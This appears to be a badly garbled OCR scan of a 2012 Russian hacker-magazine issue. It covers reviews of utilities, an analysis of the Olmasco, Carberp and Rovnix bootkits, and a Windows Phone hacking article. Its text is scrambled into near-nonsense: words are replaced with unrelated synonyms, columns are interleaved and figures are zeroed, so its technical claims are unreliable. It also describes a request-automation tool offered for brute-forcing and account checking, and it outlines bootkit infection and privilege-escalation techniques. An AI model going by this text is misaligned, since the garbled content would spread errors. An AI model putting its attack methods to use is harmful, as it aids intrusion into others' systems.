обнов л е н ие б а зы си гнат ур ;

0.

0.

Radmin Vieweг.

Уд а л енное на ыключение комок п ьютеров. Эт а

Автор рекоме н ветрено располагать с

000 до самого 000

сервиса. Файл со аккаунтами в долгу име т ь внешность :

И нт ервал флуд а из по отношению дн ого мейла число л яет пример н об об д давай ми н уту, п оэ т ому соз д ате ль п ро­

фотосканирование д равно р екторий.

функ ц ияслужитд л моя особа выключениялюбо г касательно

граммы рекомендуе т рабо т а т ь со ней не без; д е д ика,

РЕ

удаленного компьютера alias г руnпы комок п ью ­

что-то около равно как около этом д остигается д остаточно боль­

Rebuilder:

теровсвин д ойнаборт~

оптимизация РЕ -файл а; изменение базового а д реса РЕ- файла.

0.

получай ла т равным образом н равным образом ц е. По дд ер­

Б ыс т рое сканировка сети. П ро га осу щ ест­

TaskVieweг:

формирование дампов

0.

020 симво л ов

0.

Функция

Wake-On-LAN.

шая быстрота флуд а. Из удобс т во D eath-MoЬile Эта функционирование п озво ­

следуе т отмети т ь п одробный ло г текущих

РЕ Editor:

ляет подключать инструмент аленный комnьютер равным образом л равным образом

действий [действие, пункт телефона, мыло!,

редактирование 0 05-заголовка;

гру п пульт управления колтун п ью т еров, если бы они поддержива ­

а и лог, во котором фиксируется, какие

опора только на по отношению г в отношении вид т а РЕ + [64Ьitl;

полуют функцию Wake - On - LAN.

сведения доставле н ы, а какие невыгодный дошли

Интуитивно удобопонятный ан т ерфейс равно комфорт

прежде а д ресатов. Остальные фичи п рограммы твоя милость

просмотриредактированиетаблицимпорта/

ис п ользования сканера автор советую тебе оце­

сможешь изучи т ь п ри личном ознакомлении

экс п орта.

шерстинка самостоятел ь но.

вместе с н ей .

исправление

CRC;

ХАКЕР

03/158/ 0012


X-Tools

..

Автор:

f,:;:-- По- ~..:йк=""::..L---,

01cJ1o ПОТСIКО8:

00

О Nc. ru

@ Reg.ru Q Who.•

З.цержка (cet~:yttA):

regexp):

~=х:t::_и-т:т':':onoe~ ЬмюmeНJCТJ)OIOtchatset

~mi'{,m.JX]}-oтmi'IAomax торе!И1 СУIФОМ symЬol ~(tМ{. IМх)} • ОТ nWI АО IМХ букв d ·цифр, ·бука 0111Н цнфр) дльтернатноа: ~IU~T08.!Jitl,lJt2HT.A,

проверкасписка доменных имен; наличие трех различных движков

Windows.

да сео шник ов всех мастей утилиту

проверки;

Dom aiп

сохранениеспискасвободных

IL:J

(TlJPT

относительно ~ТЬСА011еН&N9 01

~= СеобоА110:

.~chelo,nocne

Эа11ято:

котороrо 011.ет :

~~От 0 АО IOOМК!JJ08.!1 helo.ru)

Fiп deг. Как несомненно изо на­

звания, буква тулза предназначена

доменов на различных форматах;

чтобы поиска свободных доменных

что из ть продлить пре­

имен. Зачем тебе доменные имена?

рванную проверку;

Прога прозрачно далеко не поможет

дальше, а в рассуждении сего практично п родать

теб е зарегистрировать la затем и продать! какой viagгa.

н уждающимся! Та кже дозволяется создать хороший SЕО-шоп в хорошем до­ 81

мене- вариантов бессчётно

05

Qст,апосъ:

021

Всего :

002

com, хотя

.

самую малость подобное поддернуть

совсем к тому дело идет . Наприме~ вона

Основные внутренние резервы программы:

0

Ouo<&oo:

~ nн6о 0 нnн 0 ОМ!ОМ ,a,b,t

Name

Их спокон века дозволительно спрятать по­

Текущее '*'CIICI nотакое

o{l,lD} l[atx:}{1,2}1\d{2}1}

.rul .com} -...eнooюнerult1»!

nн6о жчеn (т . е .

Пр едставляю твоему вниманию про­ стонезаменимую в целях домейнеров

Статнсn«е работы

n-:

DOMAIN NAME FINDER, ИЛИ КАК НАЙТИ КРУТОЙ

Система:

ВЫхоА

{att 0*21 ...}·

0 ...&>2ЦНФоы

д....,._.

ДеtiстемА

Формат wаблона.(стиль

\w

al-chemisl. URL: al-chemisl.ru/ dnfinder.hlml .

проверкадоменных имен, задан­

регэпс в целях поиска в чем дело? -т что касается словно

ных шаблоном на стиле регулярно­

xakepviag га .com: [а -zH5, 0}viag га.соm.

го выражения;

Д ерзай!

Автор:

Автор :

Автор:

Z.Razor IZerveRTeaml. URL:

www.zerverteam.com.

Marcello Pielrelli & Gianni Baini. URL:

URL: z-oleg .com/secur/aps.

Сис тема:

Ьit.ly/ukWQSX.

Windows.

Систе ма:

Зайцев О. В. 1"CP-МU)(·ТCPPOOI.Sa....-Мula.дloтoнfll05

Система:

Еd\оТСР!f>(Э:I«нн•ит дмnрВIАета..ае

sytSIII

В.Мтаное

C8flaмc0tscaod

В.Мта

Windows.

с.р.нсо.уr-

Windows.

Н.СS.

В.Мта

c.plмcOuCМICII .... Ofi)/~TIТ&ni!OH!Iol! OoorGioo(ГIOOIP"•apa...:.-в...тa C:.S:.Ifl)f'ТP

&IДIIOH

ClpllpFТP

08Л11а

T10j$11IМI\ti'Panwha.TIOIIIII...В.д110н!lol!

SSI-+aipelp

-

Web Tool- сие

программа, предназначенная

на автоматизации

GET-

равно РОSТ-эапросов .

Соответственно, может прилагаться интересах

б рута/пареи н га/чекин га/на крутки хостов/ата­ ки/прокси-чекинга да т. п. Во всех полях программы lза исключением п олей Data да U seгAgeпt l п оддерживаются следующие переменные :

#user# - ЛОГИН , #pass# - отзыв , #mdS(user)# -ЛОГИН В mdS, #mdS(pass)# - параль во mdS, #tokenl# - #tokeп(l-X)# - токены, #count# - регистратор брута. В коде, полученном по прошествии запроса вместе с токе­ нам, осуществляется разглядывание указанной строки.

На тему безопас н ого стирания данных велось

только ахти нужная программа. Она проел у шива­

ее да представить тебя не без; случающийся тематиче­

ет мало-мальски сотен портов [указанных во обнов­

ской утилитой. Имя ей-

ляемой базе д а нных программыl, имитир условные единицы т

Files Тегm i паtог.

Эта

у т илита обеспечи вает секретность

реальность для ни х уязвимых сервисов равным образом анализи­

твоих данных, целиком удаляя приватные

рует целое подключения по части сим портам.

д окументы, изображения, ви д ео да остальные фай­

Эта проект во основном предназнач ена пользу кого

лы хорошенько перезаписи свободного дискового

обнаружения хакерских атак. Как известно,

пространства. В процессе «стирания>> файлов

сканировка портов помогает предначертать образ

их предмет сколько-нибудь присест перезаписы­

операционной системы равным образом обнаружи ть потен­

вается случайными данными равно предопреде­

циальноуязвимыесервисы[например,почту

ленными символами, таким образом, восста­

либо web-cepвepl . Посл е сканирования портов

нов равным образом ть сии файлы полноте нельзя. Кроме того,

многие сканеры определяюттип сервиса, пере­

проект позволяет <<очистить>> свободное

давая тестовые требования равно анализируя его ответ.

участок не без; через сложных алгоритмов

Утилита

шифрования, ради того так чтобы навеки

ипозволяетоднозначноустановитьфактатаки. Кроме этого, обслуживающая программа может извлекать пользу ся про

были удалены небезапасным способом.

выполнения следующих задач:

Программапредоставляет для выбордевять алгоритмов удаления инфы :

Режим sоuгсе-файла:логины равным образом парали

на виде пick;pass берутся с одного файла.

0.

Режим двух файлов: логины отд е льн о, паро­ л равно отд ельно.

З.

Режим цикла: график сработаетука­ занное число единовременно сверх использования ЛОГИНОВ И паролеЙ.

ХАКЕР

03/158/2012

APS проводит размен от атакующим

перевести даже если те файлы, которые уже

коли нужно, п осле Х следующих этим волов! и выполняется поперед коне ч утнапиштим строки !ча щ е всего она состоит с символа< сиречь «1. Прога имеет

0.

APS [Aпti Ро г t Scaпneгl- сие маленькая,

поуже сколько звезд в небе разговоров, так ваш покорный слуга хочу продлить

Счи т ывание н ачинается приёмом в дальнейшем н ее !или,

три режима:

Вlдl•аное

-

0.

П севдослучайный.

0.

Британский ,

З.

Случайный.

0. 5.

Р оссийский, ГОСТ Р50739-95.

0220.22-MIEI. 6. Н емецкий, VS IT R. 7. Канадский, RCPM TSSIT OPS-11. 8. Алгоритм Брюса Шнайера . 9. Алгоритм Питера Гутмана.

испытание сканеров портов равным образом ради верка

по отношению

испытание файервола да действующий

относительно

запрещение сетевых червей;

в отношении

проверка антитроянских равно антивирус­

сетный безопасности;

HMG 055.

Алгоритм министерства обороны США,

об наружение разного рода атак; о

кон трольего работы;

DoD

ных программ, систем

IDS;

срывание троян скихпрограмм,пере­

численных во базе.

075


Матросов Алексаня , S en io г ma lw aгe ге sе агс h е г,

ESET ·

есепая v китов САМЫЕ ТЕХНОЛОГИЧНЫЕ УГРОЗЫ 0011 ГОДА В ВЕСЕЛЫХ КАРТИНКАХ Март сего года- самое правильное миг для подведения итогов возраст прошлого. Ну, самовластно понимаешь: новогодние отпуск поуже позади, до самого майских

Load MBR

праздников до настоящий поры далеко, умный светлая- можно и итоги подвести.

rea d mod e

LoadVBR 1

rea d mode

0

-----------,

load malicious : MBR/VBR __________ ,1

Load bootmgr о

Bootkit

РоС

evolution:

./ Mebroot (2007)

./Vbootkit (2007)

./ Mebratix (2008)

./ Stoned Bootkit (2009) v' Evilcore х64 (2011) v' Stoned х64 (2011) 1. Развитие современного

буткитастроения

,----------NT kernel :

Bootkit Threats evolution:

./ еЕуе Bootroot (2005)

./Vbootkit v2 (2009)

Рис.

что до

read mode/ protected mode

, ___________ modifications ,1

Load winload.exe о г winresume.exe

./ Mebroot v2 (2009) v'Oimarik (2010/11)

,-----------, load rootkit

read mode/protected mode

./Oimasco (2011) Load kernel and boot start drivers

./Rovnix (2011) v' Carberp (2011) Рис.

0. Схема

загрузки буткита

driver , ___________ ,1


Веселая триплет буткитов

Рис . З . Модифицированная

VBR получи и распишись зараженной системе

MBR Code

MBR Code

Partition ТаЫе Entry #1 Partition ТаЫе Entry #2 Partition ТаЫе Entry #3 Partition ТаЫе Entry #4

•••• •• • • ••• • •• •• •

.......

Partition ТаЫе Entry #1 Partition ТаЫе Entry #2 Partition ТаЫе Entry #3

MBR Data

Bootmgr Partition

Bootmgr Partition

05 Partition

..

Partition ТаЫе Entry #4

MBR Data

........

• ••• • ••·=·• ••• ..•,• . -=· • • ..... •

.....

...

05 Partition

............. Unpartitioned Space

Olmasco Partition .i

Before infecting

0. Раздел про

D

комnонентов буткита

'

After infecting

Empty Partition Entry Рис .

:·-:

Active Partition Entry

Existing Partition Entry

Olmasco

т рамы з р ения развит_ия во ре д по отношению н осного относительно гр аммнаго обе­

ядра равно используют интересны е технологии. Развитие современно­

спечения п ро ш е д ши да го д не грех высказаться что бадняк

го б у ткитсстроения не запрещается разыграть из себя на виде схемы , представлен­

развития 04-битных буткито во . Е сли на

утнапиштим получай рис.

0010

году ми был

известный только что до д ан бу т горбач д ля 04-бит н ых систем- Win64 /0imaгik

0.

Здесь отображены особенно значимые моменты что на развитии

ITD L41, так во этом году да мы вместе с тобой п в рассуждении л учили интересн ы й перегар изо Rovn ix, ZeгoAccesslupdate l , TDL4 Iupdatel, СагЬегр, Olmasco !также извест ­ ный на правах MaxSSI. И сие т что до л ько те у г розы, кото р ые умею т обходи т ь

диска IM BRI другими словами иной ради г рузочный код, какой касательно т рабатывается

защи т ные мягкое золото н измы пр в рассуждении на ерки ц иф р овой по-под п иси д ля мо д ульишко

покамест давно основы инициализации операционной системы, вредонос-

Р об С-реализаций, где-то равным образом во воплощении сих технологий во боевых вредоносных программах. Заражая нагрузочный квадрант телодвижение ко ого


Рис.

0. Функция загрузки файла изо скрытой файловой системы- Olmasco

возьми аз многогрешный утилита может надергать инспекция по-над загрузкой компо­

ТА-ДА-ДАМI ПЕРВОЕ MECТQI

нентов операционной системы, так чтобы записать модификации во сей

Итак , блюдо площадь по мнению технологичности занимает

процесс.

стращание интересна во первую кортеж тем, что-нибудь модифицирует

Именно сии модификации на дальне йшем позволяю т обходить механизмы проверкицифровой подписи равно находить применение вредоносные

Эта

VBR [Volume Boot Recoгdl равно имеет полноценную собственную файловую

систему к хранения дополнительных модулей равным образом других ком­

драйвера во осмотр защитных механизмов. Но дайте все вер­

понентов. Как выглядит модифицированная

немся для нашему хит-параду сложных угроз, тем паче что-то их спектр

системе, показано в рис.

действ равным образом тельно адски широк.

Dlmasco.

VBR

держи зараженной

0.

Большинство антивирусных продуктов научились результативно

В прошлом году суп луг нашег об рейтинга занял Stuxпet,

справля ться от активным заражением буткитам и, использующими

а во одном с последних номеров автор поуже описывал машины рабо­

модификацию

твоя милость Duqu [обнаруженного в осеннее время младшего брата Stuxпetl. Но , увы,

нее сказа ть , стали рыть глубже пользу кого противодействия антивирусам .

MBR.

Однако злоумышленники пошлепали дальше, а точ­

сверху настоящий в один из дней ему никак не предуготовлено попасть во отечественный рейтинг, в такой мере как бы львиная

Это вызвало у некоторых антивирусных вендаров определенные

лихо используемых им технологий сделано знакома нам соответственно червю

сложности, во результате в чем дело? злоумышленники получили возмож­

Stuxпet [хотя, даже если бы авторы проплатили рекламное полоса на жур­

ность оста ваться незамеченными во системе. Ус тройство внутрен­

нале «Хакер>>, да мы вместе с тобой бы поместили их продукт держи суп площадь :11.

ней файловой системы да заслуживает отдельной статьи.

Duqu

разработан получи основе праздник но самой программн ой платформы.

Из его Запомнившихея особенностей есть расчет отметить, пожалуй, только эксплуатацию шикарной 0-dау-уязвимости

CVE-2011-3402

В конце жесткого диска создается полновесный раздел, во котором

размещаются всегда компоненты буткита [рис.

01 .

Файловая концепция хра нит сезон да дату создания файла да даже если

на загрузки вредоносного заключение на сердцевина равным образом повышения привилегий,

контрольную сумму ради проверки целостности. С точки зрения

так сие еще положение для того отдельной статьи ;l.

технологичности буткит вместе с этой файловой системой вследствие ее


Веселая тр ойка буткитов

структуре превосходит постоянно некоторые угрозы, использующие скрытые

файловые хранилища. Сигнатура корневой дире ктории скрытой

файловой системы приведе бери сверху рис.

0.

Функция загрузки фай ла изо скрытой файловой системы в руткит-драйвере представлена получай рис.

ЧЕТЫРЕ РАЗНЫЕ УЯЗВИМОСТИ

0.

Так на правах программа-драйвер написан сверху чистом С вне обфускации, нам уда­

лесной великан декомпилировать ко д драйвера близ помощи

IDA

да

СЕЙЧАС УСТАНОВЩИК ИСПОЛЬЗУЕТ

Hex -R ays

равным образом таким обраЗ'ом возбудить его структуру. Не не столь интересен да ход модификации системы нет слов промежуток времени

ДЛЯ ПОВЫШЕНИЯ ЛОКАЛЬНЫХ

ПРИВИЛЕГИЙ В СИСТЕМЕ

загрузки. Э т через порядком запутанный процес из проиллю ст рирован на рис.

0.

Д ополнительно овчинка выделки стоит пометить равным образом так , что-нибудь

Olmasco,

ТУ- ДУ-ДУМI ВТОРОЕ

равно как да

имеет буткит-часть, которая модифицирует библиотеку

TDL4, kdcom.d ll.

MECTOI

Второе луг до праву занимает обно вленная трансформация СагЬегр, ко­ торая обзавелась порядочно любоп ытным буткит-функционалом.

Именно возлюбленная отвечает из-за отладку ядра подле правая рука по части щишки WiпDbg, а после ее модификации настройщик безвыгодный может пристать для системе к

СагЬегр общий позволено дать название никак не всего лишь одной с самых техно­

удаленной отладки. В итоге вариантов остается невыгодный приблизительно много: либо

логичных, однако равным образом самой жадной вредоносной программой прошлого

иссле д овать целое мо д ули на статике [в случае если бы их сейчас посчастливилось

года. Этот бутки т атакует начальник олее извес т ные дистанционные

извлечь с скры праздник файловой сис темы] , либо слаживаться на ернуть

сис тем ы саман во ско го обс л уживания, хотя р ечь неотложно малограмотный об этом.

ориги н альн ы й

Впервые идентич ный буткит-ф унк ционал появился у Wiп64/Rovпix,

kdcom.dll

равным образом складывать вредо н осный программа-драйвер вр у чн ую.

Исследовать функцио чистоган бу т кит-части также никак не та к-т в отношении просто,

котор ый на нача ле возраст д оставил нема л что до хлопот пользователям

же во этом нам поможет эмулятор

рунета. СагЬегр равным образом Ro vп ix базируются н а одном буткит- коде, инфор ­

ранней стадии загрузки прямо Итак,

Olmasco

Bochs равно отладка из IDA Рго.

системы возьми самой

мация по части продаже которого неоднокра т только во стреча лась в разны х

получил во-первых район вслед технологичность соб­

кибе ркрим ина льных форума х на начале пр ош лого го верно .

ственной файловой системы равным образом неизбитый станок буткита , который использует ря д наработок изо

TDL4 равно

Изнача льно

Continue kernel initialization

Loal MBR

Load "drv32"

is loaded апd executed

iпfected

ог

"drv64"

Call KdDebuggerlnitialize1 from loaded kdcom.dll

LoadVBRof mallclous partltion

substitute kdcom.dll with "dbg32" что до г "dbg64"

VBR is loaded апd executed

Load "\boot" from mallclous flle system "\boot" is loaded executed

Рис .

апd

Hook BIOS lnt 03h handler load original VBR

Load wlnload.exe

Substitute Ems E пaЬied optioп with Wiпpe

VBRof originally active partition is loaded апd executed

Load kernel and boot start drivers

Рис .

0.

Bootmgr is loaded апd executed

имел всего функционал к пользова­

вместе с бутки в таком случае м. В процессе анализа свежих дропперов ми попались

вслед ностро нестандартных системных модификаций .

mЬг

Carberp

тельского режима, только прошлей осе нью были создан ы модификации

затрудняет врачевание

Read bcd

Процесс модификации системы нет слов момент загрузки- Olmasco

0. Покупайте наши буткиты!


Р ис.

00. Д е ко м пилированны й

ко од , отв е тс т на е нны й ради вон как сплуатацию у моя персона звимастей -

сверху зеницы любопытные строкавые константы изо сейчас распакованного

установщика [рис .

Рис.

Carberp

01 .

01 . Снятие х уков

равно спnайсов от системны х функций на исполнении

Carberp

MS11-011 [win32k.sys SystemDefa ult EU DC Font vul nl; NЕТ Runtime Optimization vuln l http:l/osvdb.oгg/show/osvdЬ/71013 ).

Эти строчки зараз наве л равно нас возьми мысли в отношении системных модифи ­ кациях, производимых буткитом. Н что до начинать снача л а погово р им о дропп е ре, какой-никакой охватывает целостный качество зксплойтов на повы­ шения привилегий. В первую каскад их реальность свя з ано со тем ,

Д еком п илированный код, эксплуатирующий уяз на имос т и, п ри­ ве д ен нате рис.

0О.

Ещ е одной инте р есной особеннос ть ю работы д р а п пе ра пишущий эти строки во ля ­

почто ради установки буткита требуются услуги администрато-

ется со н ятие различ н ых хуков да сплайсов из некотор ы х систе мны х

ра или — или системы. У корпоратив н ых пользователей [а в частности они

ф у нкций переднепосредствен н ым после п уском бу т ки т- губы н овщика

являются целью злоумышленнико в! , имеющих д оступ для ДБ О, может

[ ри не без; .

п росто далеко не взяться п р ав держи включение ис п олняемого файла от высокими

011.

Это своего рода отвод различных п есочниц равно сре д вместе с т на мони ­

п ривилегиями, равно мето д ы социальной инженерии здесь поуже малограмотный по­

торинга, которые ис п ольз у надстройка хуки во пользо на ател ь ском режиме.

могут. П озтому не долго думая рот н овщик эксплуатирует цифра в один из дней н ых

В процессеработы буткит-части на обхо д мягкая рухлядь н измо во насчет на ерки

уязвимости на п овышения локальных быть во илегий во сис т еме:

М 010-073

lwin32k.sys Keyboaгdlayout vuln l; М 010-092 [Task Scheduleгvu l n);

дигитальный по мнению д писи да других средств после щ равно твоя милость з а гружае т не без; моя персона вр е ­ д онос н ый драйвер. За д ач е й сего драйве р а моя персона вл яется во далеко не др ение полезной нагрузки на адре из н ое пространс т умереть и никак не встать u sе г-m оdе-процессов . Д касательно сего испо л ьзовались методы внедрения на согласно ль зо на а т е ль ском

р ежиме, такие ка для N tQueueApcT hгead[J/NtResumeT hгead[). Фак т ически С агЬегр sos т оит изо трех частей: бутки т- части, за­

ИНТЕРЕСНОЙ ОСОБЕННОСТЬЮ ДРОППЕРА ЯВЛЯЕТСЯ СНЯТИЕ

ХУКОВ И СПЛАЙСОВ С НЕКОТОРЫХ СИСТЕМНЫХ ФУНКЦИЙ

гружаемого ей д райвера, равным образом dll-модул моя особа , на н ед р яемо г об др айвером в п ользова т ельском режиме. Странно, что-то однова ра потому что тчи ки неграмотный ис ­ пол ь зовали целое возможнос т и, которые им пре д ос т авл моя особа ет загру ­

женн ы й ко д н а уро во отнюдь не ядра системы . В се перехваты системных функ ц ий пасть н авливаю т ся ранее на неграмотный д ре н ным мо д богослов на по части л ьзо­ вательском режиме. Их ле г ко об н аруживаю т та кие инс т румен т ы, как

GM ER

alias

RKU.

СагЬе г р получил блюдо район вслед техноло г ичность, та ко в качестве кого з т относительно


Веселая тро йка буткитов

·-----success ·--· 1

Loal MBR

-----·fail----·

0 1

'

Real mode

r-----

---------- Win 0000·------------ •

0

LoadVBR

0

Real mode

WinXP r - - ...

' ',

>< ·с:

>

об

0

,

.

Load bootstrap code

0:::

0

success

,

~

fail

с:

~

0

real mode 0protected mod

0

'

Determine 05 Digit Capacity

Load bootmgr

0

0 1 1

'

lnstall Corresponding Kernel mode Driver

rea l mode 0protected mod

Call SheiiExecuteEx API with "runas"

Load winload.exe or winresume.exe

0

0 1 1 1 1 1

Overwrite Bootstrap Code of Active Partition

________

lnitiate System Reboot

Рис .

02. Заражение системы

буткитом

.,

.

real mode 0protected mod

' '

Self Delete and Exit

Рис.

Rovnix

ранний банковский буткит, что действие ивн касательно работает для ак

на х86·, та для да во х64-сис тем ах. В

0012

Load kernel and boot start drivers

г по части д у, моя персона рефлексия ю, наша сестра до сего поры далеко не крата

Итого, Rovпix стал п ервой угрозой, за казав ш ей неэффектив­ ность многих антивир усных пр что касается д ук тов , которые проверяли целост­

ность лишь

услы шим об этой вредоносной пр ограмме.

03. Загрузка Rovnix

MBR.

В итоге градиент атаки, используемый буткита ми,

итак фактически неисчерпаемым, ноне нераздельность си­

ТРЕТЬЕ МЕСТОI БЕЗ ФАНФАР

стемы проверяется бери поздних этапах загрузки системы . По сути,

Треть е п оче т ное район нашего хит-парад а занимает Rovпix,

не откладывая систем а загр ужае тся всегдананедоверенной платформе.

ко т об рый первым стал испо льз что до вать модификацию областей за­

Возможно, методика SecuгeBoot исправит эту ситуацию во WiпB ,

грузочного кода, по части тличног по части через

так сие бросьте единаче безвыгодный бойко .

проиллюстрирован в чалтык .

MBR.

Процесс заражения системы

02.

Как видать изо б л ок - схем ы , во процес се заражения, вслед исключе ­

ЗАКЛЮЧЕНИЕ

нием э тапа модификации В ооtst гар- кода, кто в отсутствии ни ложки необычного.

В этом году во нашем хи т-параде самых технологичных у гр холм

B oo tstгap- э ведь ча ст ь загрузчика, которая отрабатывается приёмом

присутство иди для черту вр едонос ны е пр что касается гр аммы, имеющие несходный

п ос ле инициализации VBR IVol ume Boot Recoгd], н в отношении п еред загруз­

буткит-фу нкционал равно со дер жа суп е скрытые файлов ые системы.

каковой сис темног что до bootmgг. Именно сие да позволяет потом

Всё сие на первую очере дь пр извано скрыва ть вредоносные п ро­

воздействовать получи и распишись загрузку системы. Ro v пi x, по образу да

граммы в рассуждении т антивирусных продуктов, п ротиводействовать лечению

Olmasco,

использует

скр ыт ую файловую сис тем у для того х ран ения своих компонентов да по­

активного заражения равно усугублять прокладывание криминалистиче­

сле д ую щег в отношении д оступа для ним рядом помощи буткит-ко согласен , но, на отли ч ие

ской экспертизы. В наступившем году попроще проживать малограмотный станет, равно ваш покорный слуга

по отношению т файловой системы

думаю, сколько многие с описанных во этой статье векторов уж себя

Olmasco,

симпатия устроена конец не мудрствуя лукаво ,

ведь есть, п что до сути, представляет собою не мудрствуя лукаво край диска , на кото­

исчерпали равно на нашем следующем хит-параде, если угодно , появятся

рую записаны данные, равным образом неграмотный имее т какой-либо сложной структуры.

угроз ы , использующие специфические особенности со вр еменных

В пр ан цип е, на описы ваем ом от л учае каста облас ть вместе с д анными нужна

процессоров, такие наравне многаядерность равно аппаратная вирт уализа­

просто-напросто чтобы того, так чтобы на проце ссеработы буткит был способным просмотреть

ция . Но от точки зрения реальных угроз сие если угодно лишь только на слу­

необходимые компо ненты равным образом променять ими касательно р игинальные п ри после ­

чае их рентабельности, поскольку, в качестве кого показывают мои наблюде­

гр узке системы.

ния, кибеприступ н ики- оченно прагматичный народ. :Х:


MALWARE

Юраша «yurembo» Язев

ь

про мобильных

lyazevsoftldgmail.coml

-

Чтобы учредить

предмет класса

MediaEiement (nроизводным от него является

предмет mediaSoundl,

<<ОКОШеК>>

ment Height="120" Name="mediaSound" Width="160" />.

ИССЛЕДУЕМ МОДЕЛЬ БЕЗОПАСНОСТИ

wjndowsphonehack·

ПОПУЛЯРНОЙ ОС ДЛЯ СМАРТФОНОВ НАПРАКТИКЕ Вообще-то на нашем журнале работает да в чем дело? ты фанатов винды, так например пишущий эти строки

не в таком случае — не то отечественный редактор, уролог Лозовский . К счастью, спирт жуть обижен тем фактом, сколько MS усердствовать целую вечность тянула со обновлением его любимой WM6.5, и оттого поручил ми что есть мочи разобраться, в духе во новой системе обстоят ситуация вместе с малварью равным образом уязвимостями. Вперед!

надлежит во ХАМL-код добавить такую строчку: <1\ediaEle-

Н&~Ш~- хороший сайт, содержащий много интересной мифы по части хаках WP

0-7.5.

На диске находятся

три nроекта,

разрабатывание которых описана во статье .


Мал во арь дл мы моби льн ых <<окошек>>

rn

касательно недавнего време н да во стане

WP бы л об дос т аточно спокой Windows Phone 0.5

.

но, так во середине декабря бери п л атфо р ме

__

..,......

.,_" ....,._ .,_,_ ..__"_..,

~ .._ DМc....,.tGIIOI

сверх ожидания был зафиксирован фак т р е бут а операцио нн ой

..........__ . ,..м~

.......

сис т емы, во результа т е которо г о, п осле получе н ия специал ь а подина г о­

товленного СМС-сообщения l g oo. g i /Y Ыru l , цель ото п равки равным образом чте н ия эсэмэсок перестает работат ь . Тако го но эффек т а мож н в отношении д оби т ьс автор , от­

__ "_

;;. ~.н-s,

.,.

··

- ~.ь.~

- ~tT)'II*

VIO,Pf)UIII).OЦ.C

0

А уведомление , пишущий сии строки которо го дано во т айле н арабочем столе, может

-~~ 4

.. ~т ...

.

._...

0&JIW<ci18IOIICIIIOO

...__ ... ..,..._,

,_,. ......... _"

~~~OIIUI((-U­

~~-)IN

...... ......,., ......,., .,.,.......... _,. .,....... ...... ,_,., _., lt(6.JoU.tUZ

~н.fкоо

,.,

"'"'-""" ...............

правив особое извещение изо социал ь утнапиштим се т равным образом [ н апример, изо Facebookl.

.__"_..,

f'Ю1VI-161.\-.4W.~D<IfD){C.U....

.,.,.,...,._,-.....-ao>J

заблокиро на ать по сию пору функции телефона! Этот ба г- отнюдь не новинка на мире мобильных устройств, на свое во ремя им равным образом работа л равно да айфо н ы, и андрои д ы .

Ес л равно отнюдь не взимать изумительный на н има ни е п осле д ний рассмо т ре нны й э число «пи» зод , т относительно

настоящий ба г никак не что-то около уже равным образом критичен, особенно по мнению срав н ению со СМС - атакой

Реда ко тируем регистр

получи айфон, которая позволяет атакующему нахватать п олный кон т роль над устройством. П ользова т ели ин д рои д ев в свою очередь были на опасности: << СМС-смерть» выкидывала таксофон во офлайн или, почто ажно хуже,

Parameter равно сделано затем

предоставля л а атакую щ ему соответственно лн ый дос т у п для системе .

ви во единицу, PortaЫe D eviceNameSpace E xclude F romShell- на нуль,

ShowlnShell

устано­

EnaЫe l egacyS up port - во е д ини цу.

В настоя щ ее на р ем мы с << т рех для ит ов>> всего лишь

WP 0 уязвима д л я 2012-rol, обновле ния , Microsoft на последнее минута

СМС-атак . Когда п да сались сии строки [я нв арь устраняющего текущий мираж , до этого времени малограмотный было.

измени следующие ключи:

Использо во а т ь

WP 0 по образу

модем лишенный чего сnец да аль н ых nриготсе л ений

т оже было нельзя. Н о, для счастью , во

WP 0.5 сие

разлад бы л об

конец много раз выпускает апдейты пользу кого своей мобильной оси , потому-то

исправлено . Правда, последнее термин всё в одинаковой мере остается из-за операто­

будем надеяться, ась? починка последует куда поспешно .

кашаса сотовой связи, равным образом ежели себестоимость никак не п ре д назначен про расшаривгния интернета, в таком случае им п ридется nользова т ьс ваш покорнейший слуга исключите л ь н относительно получай конструкция н ом

девайсе

[xe-xel.

ХАКЕРСКИЕИССЛЕДОВАНИЯ Перейдем с обзоров чужих ха ко во ко реализации собстве нн ой тесный вари.

невыгодный сам крата кракнуть систему, поз т ому ты да я рассмотрим только лишь некото ­

рые изо сих ха ков, самые вам д ающиеся равно общест во енно полезные.

Несмотря для то, чт по части WP во целом выгля д ит <<неломаемоЙ>> сис темой (что MS ;11, у хакеров, в качестве кого у Мальчи ш а - Кибальчиша,

:1

хватит чудеса д ля

Как известно, чтоб разлечить уклад около управлением необходимо покрыть расстояние утомите л ьную проце дуру ре г истра ц ии

Phone Marketplace

WP 0, в Windows

очищать тайные ходы, равным образом их малограмотный отходить ко сну .

равным образом ещё следовать пл а т равно т ь

тов>>. Однако умельцы изо

09 <<веч н озеле н ых прези д ен­ ChevronTeam изготовили ту л зу ChevronWP7,

П риложения к

WP выполняю тся

за д

.NET во

ок р ранее н ии

Silverl ight.

Это значит, что-то н ам н ичего никак не придется nиса т ь из нуля равным образом позволительно буд ет воспользоваться готовым

которая разлочивает систему.

Эта утила в свою очередь далеко не бесплатна, же следовать нее рядом д ется передать несравни­

API.

П роще лишь отправи ть

SMS

сверху небесплатный

номер. Так пес не без; ним в ш е <<nолезное>> добавление -де л ае т сие зараз

мо не столь - девять <<nрези дентов>>. Она кор р ектно функционировала

в дальнейшем запускаl Д ля того с целью дозволяется было обрабатыва т ь действие

исключительно держи

жизненного цикла приложения, нужно включить следующее насчет ­

WP 0,

а этак что

Mango MS

пофиксила ба г во

ис п ользова л а nрограмма, так теп е р ь ути л а

WP 0.5, который от Chevro nTeam неграмотный работа­

странство име н :

ет. В принципе, снедать е щ е одиночный д а д айский со п особ разб л окироват ь устройство к запуска сторо н них п риложений. Дл аз многогрешный каждого произво ­

usi п g System .Wiп dow s.N av i gati o п ;

дителя дьявол от во ой, численность действий, необходимых интересах преимущества

цели, равно как различается. Как говорится, Гугл на помощь!

:1

Кроме того, требуется прибавить площадь имен Microsoft.Phone. Tasks, с тем работ ать из SMS равным образом мылом (см. н иже ! . За тем напишем об­

П ользователь новой мобильной <<фо рточки>> никак не имеет доступа

работчик события, на холм н икаю щ его пр равно заг р узке приложе н ия:

ко файловой сис т еме смартфо н а. П касательно д для л ю ч е нн ое конструкция невыгодный ото­

бражается во Эксnлорере в духе д в рассуждении п что касается лн да тель ны й диско во ый н акоnи т ел ь, но сие подумаешь исправить. Сnер во а отключидевайсот компьютера на

protected override void

чистоты эксперимента, открой вычитчик реес т ра, разверни отрог

{

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControiSet\Enum\USB, там найди строку ZuneDriver, ужотко открой ее материнскую во етку Device

БЕЗОПАСНОСТЬ Посмотрим , что-то

